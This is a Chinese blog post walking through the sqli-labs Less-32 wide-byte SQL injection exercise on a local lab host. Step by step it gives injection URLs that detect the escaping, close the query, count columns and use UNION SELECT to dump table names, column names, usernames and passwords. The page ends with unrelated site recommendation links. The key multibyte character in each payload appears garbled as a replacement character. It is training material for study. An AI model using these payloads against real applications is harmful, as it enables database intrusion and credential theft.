sql_lab之sqli中的宽字节注入(less32)

爱喝水的泡泡2023-12-26 9:41

宽字节注入(less-32)

1.判断注入类型

http://127.0.0.3/less-32/?id=1

http://127.0.0.3/less-32/?id=1'

出现 \' 则证明是宽字节注入

2.构成闭环

http://127.0.0.3/less-32/?id=1�' -- s

显示登录成功则构成闭环

3.查询字段数

http://127.0.0.3/less-32/?id=1�' order by 4 -- s

http://127.0.0.3/less-32/?id=1�' order by 3 -- s

说明字段数为3

4.用union联合查询判断回显点

http://127.0.0.3/less-32/?id=-1�' union select 1,2,3 -- s 记住前面要加 - 因为不加 - 则会正常查询第一个数不会执行联合查询

5.查询数据库名

http://127.0.0.3/less-32/?id=-1�' union select 1,database(),3 -- s

6.查询表名

http://127.0.0.3/less-32/?id=-1�' union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479 -- s

爆出security里面的table表

7.查询字段名

http://127.0.0.3/less-32/?id=-1�' union select 1,database(),group_concat(column_name) from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273 -- s

8.查username和password

http://127.0.0.3/less-32/?id=-1�' union select 1,group_concat(username),group_concat(password) from users -- s

相关推荐
ZHang......1 天前
SQL操作全面详细笔记分享
数据库·sql
K***72841 天前
保姆级JavaWeb项目创建、部署、连接数据库(tomcat)
数据库·tomcat·firefox
几何心凉1 天前
全场景融合与生态共赢:openGauss如何破解企业数据库选型难题
数据库
SoleMotive.1 天前
项目中如何排查解决慢接口问题
数据库·redis·算法·缓存
betazhou1 天前
SQL server2019 配置故障群集文件共享方式always on高可用群集
数据库·sql server·高可用·always on·文件共享见证
TDengine (老段)1 天前
一文讲清 TDengine IDMP 资产数据导入
大数据·数据库·ai·时序数据库·tdengine·涛思数据
O***P5711 天前
【Mysql】:如何配置最大连接数?
数据库·mysql
x***38161 天前
从MySQL迁移到PostgreSQL的完整指南
数据库·mysql·postgresql
p***23361 天前
【MySQL】CAST()在MySQL中的用法以及其他常用的数据类型转换函数
数据库·mysql
热门推荐
01GitHub 镜像站点02UV安装并设置国内源03安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)04BongoCat - 跨平台键盘猫动画工具05本地部署阿里最新开源的Z-Image06Linux下V2Ray安装配置指南07【超详细教程】手把手教你从微软官网免费下载Windows 10官方原版ISO镜像(2025最新版)08Meta第三代“分割一切”模型——SAM 3本地部署教程:首支持文本提示分割,400万概念、30毫秒响应,检测分割追踪一网打尽09【保姆级教程】免费使用Gemini3的5种方法!免翻墙/国内直连10Labelme从安装到标注:零基础完整指南